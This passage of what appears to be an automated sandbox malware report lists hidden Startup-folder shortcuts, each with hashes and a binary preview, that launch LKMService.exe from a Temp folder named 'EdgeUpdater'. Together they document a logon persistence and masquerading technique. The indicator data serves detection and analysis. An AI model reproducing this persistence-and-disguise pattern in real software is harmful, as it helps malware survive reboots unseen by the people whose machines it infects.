Preview:	L..................F...."...o.k.....Xv......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY3=..Temp..:......CW.^BY3=....l.....................Fn..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8d218fff8069467f8a8cadb5926b48dc.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:53 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.953715795507629
Encrypted:	false
SSDEEP:	24:8PgKpd+E0RggKLOxRNglhW8Apfv/42eVvqyFm:8PgKr0ROOxrRvggyF
MD5:	E7A3C4D50B6EC295F30B07980CD2B962
SHA1:	4AA571DBF447C584664F71D8494C875BD15D9286
SHA-256:	8152E2BDE0351F51E436C2D0AD5732B0A144BC869EC3F635983ED9F7D2CA4CA5
SHA-512:	803C84D82DE6120C26C0CCD1B4C00A6EB6A71FF44C5E74C9F572896B347F2423D3D95511B53A968183845BA6ED457FBC80904EA9461FD0C590CAA7A8693A8FC3
Malicious:	false
Preview:	L..................F...."...o.k.....)......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g.....).........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYV=..Temp..:......CW.^BYW=....l......................v@.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8dce8b53ec3e4cceb5ee02c4a86f9300.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:32 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.970480630075115
Encrypted:	false
SSDEEP:	24:8PLeOpd+E0RngK/mRNglhW8Apfv/42eVvqyFm:8PLeOr0RnmrRvggyF
MD5:	DAC9A980010F6B5B200EDE2141F74F48
SHA1:	3BF8F85612D0F3A93C269BF4F359E85039630A01
SHA-256:	55FD1AC12A895E33BEFAD941C9EE0A110C1E941222850E006B2B4AB5FC9C9F03
SHA-512:	9200660C8F2868F65523C5B6EFEC619A0D3FD3C5BCC056054F763F0BA9BAC8BDABCC450CB2662143ECE7FDBF819E1ED61D173BEB79273A8A1C9F756C662C3037
Malicious:	false
Preview:	L..................F...."...o.k.............0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....../.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYQ=..Temp..:......CW.^BYQ=....l.....................x.".T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8f5dba4e2ba148289a1e14e0880ef4ee.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:55 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.949020888079927
Encrypted:	false
SSDEEP:	24:8PuA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8Puer0R5rRvggyF
MD5:	4349F1AF58069860A828FC9FE5885290
SHA1:	B8BB702633863CB5B9171258B0AEFC60141B5A11
SHA-256:	C0EF12A8E57E89151E9AA99F4C9BC5C59313FCE56AC42559075F01C12D45FBCD
SHA-512:	4BB7421AC55212E01C1868844362C294E29C347F28D0E9D3C45C7F10573DFF820D8BC2927F1522376BAFBEC5F64C359B232F9D9F9A9BCD61AB1329F544D9DA79
Malicious:	false
Preview:	L..................F...."...o.k.............0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9018a91a49f44b5f96200cf771c3fbef.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:18 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.961074406139127
Encrypted:	false
SSDEEP:	24:8PpA3pd+E0RcgKCLRNglhW8Apfv/42eVvqyFm:8Pper0R1LrRvggyF
MD5:	400455BB32BB81CC8590C8AE2C5A2E33
SHA1:	B540E52F19B76EED21B029224C6A18F9DD77E6F2
SHA-256:	05D6D0B7C91C2D54C1B78A6582BD6AE5B012CA9AA64578985F3306DC9EDDC9E3
SHA-512:	A92B5DE7FBA4755E426C406A00C365A357424633F493DC3E39B74FBA29FC98FE4AAA21A64C8AC426F3D3F88552D1B2BCC47724DBB6F4B7EEF7735FBDC60C9192
Malicious:	false
Preview:	L..................F...."...o.k.....u.w.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY=..Temp..:......CW.^BY=....l...................../#..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_93c2f93b4fd849d1b88565fe329f6d4e.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:04 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.9455527998199535
Encrypted:	false
SSDEEP:	24:8PHA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8PHer0R5rRvggyF
MD5:	468BF416BC57EA30D1F488793CB636D1
SHA1:	CFB639546A5FEDDB33BD8C491C5324BF97354ECF
SHA-256:	CB6F85910745DDC07611B666C24B5EACA3AD673201DD0EDF50E1DDEA896FAC13
SHA-512:	6573C52F6BE684C3676BD91341C5A18CD361A5026B71552F8312CEDFA53F696AF830CCB736F5358FAF2539B1611443FC5278A60CB7670BD714D22A56CA3BA6A5
Malicious:	false
Preview:	L..................F...."...o.k....YAz......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_97a5565f0540432a96c2db4661ef56dd.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:27 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.955388196596445
Encrypted:	false
SSDEEP:	24:8PsOpd+E0R4gKG3bHRNglhW8Apfv/42eVvqyFm:8PsOr0RxbHrRvggyF
MD5:	1931EB75D37EFD8671FCE9884A38F99D
SHA1:	3DBA9FE39AADF2BC91C96E1F69EB5F6A14B0B681
SHA-256:	775EEEE04BAEE4D426046294299FF2681DA7F0C3CBA278D847577211A0D23B2E
SHA-512:	93F49F2EE4C1BD765C4F5EA88C5EE61471717CDCB32B1763A4A6511018D5EF3AA5057D497E0ECC92135BC86D5EAF2D5C850C5C36A82A3857FFBC60804866DD0B
Malicious:	false
Preview:	L..................F...."...o.k....../......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....../.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYN=..Temp..:......CW.^BYN=....l......................e..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9864950db3fe494f92842576723b362b.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:20 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.94557929811837
Encrypted:	false
SSDEEP:	24:8Pn3A3pd+E0RxHgKsRNglhW8Apfv/42eVvqyFm:8P3er0RxUrRvggyF
MD5:	58A8A95A0F8C4AB601375C81CF990E5F
SHA1:	095C3718847651FD63861BE6E9789578DA82C1DB
SHA-256:	BE1F8AF1EED0A4948992970ED13E6DCE11AD0B7DCE362D584897843D29017A9F
SHA-512:	60EBD8092C7E3A5D996FEEBCFF2B285277841FC5221ABEE43333C46C91AF4765E6FF91B0E52FAC4D778D17CBAAC8B851E558423D62E4AB69CA1B1FC2F63F75D3
Malicious:	false
Preview:	L..................F...."...o.k.............0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYK=..Temp..:......CW.^BYK=....l.........................T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9a46db2c0ae046dd8137897d8c56c57c.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:21 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.9458909688726385
Encrypted:	false
SSDEEP:	24:8P1A3pd+E0RxHgKnbHRNglhW8Apfv/42eVvqyFm:8P1er0RxvbHrRvggyF
MD5:	BF0FECC35902224D8CE10E5ABEC3474A
SHA1:	F73FD556118EB591BF2838237DE2B64BC19DCA79
SHA-256:	C01D644F3C3C3E1E022B14188D045C658A349B019FCC39A6970004AB60F1B677
SHA-512:	35F1B97E08AD86AE8F6658F495B8736E64D13C10BE8767A2FC67676AA5CA209F88078722E651A75928FF80E3E9E801E7D86761D0B537FA7FF29CE2D83CAD6256
Malicious:	false
Preview:	L..................F...."...o.k....]........0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYK=..Temp..:......CW.^BYK=....l......................e..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9e24440e0b744680a33052034df043db.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:39 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.942190496008716
Encrypted:	false
SSDEEP:	24:8PYqA3pd+E0R6PgK51RNglhW8Apfv/42eVvqyFm:8PYqer0R651rRvggyF
MD5:	D110EEFBAAE46B34E1E01DA4C7AA2A36
SHA1:	EE12C62BFDD2C40399931CE1223E5F3B0D1A5289
SHA-256:	BB15243F62B31F43C0B5ED1BD15A6EC8BE6C647999FCB0FDAD88292AAF990619
SHA-512:	B038AE473223D9C85ABF4F0ED875E24F77A5A86524F5569F78F053168FB059BED654848A1F3251E29846565D574203C0BA557FFEEA2E1324B3DDB1BDA3E72183
Malicious:	false
Preview:	L..................F...."...o.k.....CG......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY4=..Temp..:......CW.^BY4=....l.....................aNX.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9efab2ffe062471f836440b153e26fb9.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:41 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.947746816346317
Encrypted:	false
SSDEEP:	24:8PWA3pd+E0RzgK+RNglhW8Apfv/42eVvqyFm:8PWer0R6rRvggyF
MD5:	8166986E4ED1D589CB54A97ACBF6D19B
SHA1:	BF4FC12DDFE6E85E03EB1CEAF77EDA95D242749F
SHA-256:	62E74F514B5CCEC23DA619883540D1BB323DEF1BE54013A029DE72FD0D2E6E7B
SHA-512:	9863970C3E228EA33C3732F1814376C0D28272E27A97E599C05B146F26BE28A4991E29FDBA25CF4A489E038CB0B2BFB25462E910DC837FA67E35A07481F42F19
Malicious:	false
Preview:	L..................F...."...o.k....Ao.......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY5=..Temp..:......CW.^BY5=....l......................O9.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9f44457b6b99471191baae8958f10f64.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:24 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.948726629490197
Encrypted:	false
SSDEEP:	24:8PvA3pd+E0RrgKjJRNglhW8Apfv/42eVvqyFm:8Pver0RZrRvggyF
MD5:	DB4DB4D1C754B29C51EE48AACFF0D72D
SHA1:	AAACD613DF970A6C7A84236A790C749075F345A2
SHA-256:	854DFE021F89F28AC03974159CC67BA420E64692BB4709CF0F7E58AA8A6DAB6A
SHA-512:	29D9E9381D0EFB894AC59818AD4FE0F7581519ABCBFF232A9A65E36496181D594C5CC2460DFE5DE8289686E3098CA0A2AB496C9FDBC171324D896B6BF4F2D085
Malicious:	false
Preview:	L..................F...."...o.k....J.D......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYM=..Temp..:......CW.^BYM=....l......................\..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9fe5129f69ea44278a87e6eab0dcc606.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:59 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.950828237826827
Encrypted:	false
SSDEEP:	24:8PFgA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8PFger0R5rRvggyF
MD5:	1CF50E78B7155C4C741D7DC67F679A48
SHA1:	A78AFF575A9DF08BDF10DB3D8AA82C1823E1D344
SHA-256:	6D37B720CD9ACB284DBD91E87DB3BBDF543718536FA9B3F789F9359B9814BA87
SHA-512:	FD0C55554E5F2D11DF123C0B3E3517E865CB5D4D80C6EE952165305645481AD1B8F7E517604039D90356D17B8701DC6BF837D4EC13D31382C03C20A1D8C0710D
Malicious:	false
Preview:	L..................F...."...o.k.............0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a1932f351bcd418d8983e988434d983d.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:56 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.94658996653668
Encrypted:	false
SSDEEP:	24:8PxqaFpd+E0RggKLOxRNglhW8Apfv/42eVvqyFm:8PxqaFr0ROOxrRvggyF
MD5:	4E279A63B1CB9FE358574A63B911C5F0
SHA1:	A761A7A1729CB1BD5E03E809EF0325508BDBF48C
SHA-256:	9F45E130B267B09FD316F9344018ECF5DF31BCC734499E0A82E8D6BE033E0B14
SHA-512:	EBFB16BB6C65153C7DC0C266E86DCF973169CA498ADC06B6FF5DC376C085BF973B4A40EF3C1D9A16BB4DC47C25D5E81B0CBEEC8D10DB55C243FD2E5FE0199C64
Malicious:	false
Preview:	L..................F...."...o.k.............0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....:N..........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYV=..Temp..:......CW.^BYW=....l......................v@.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY 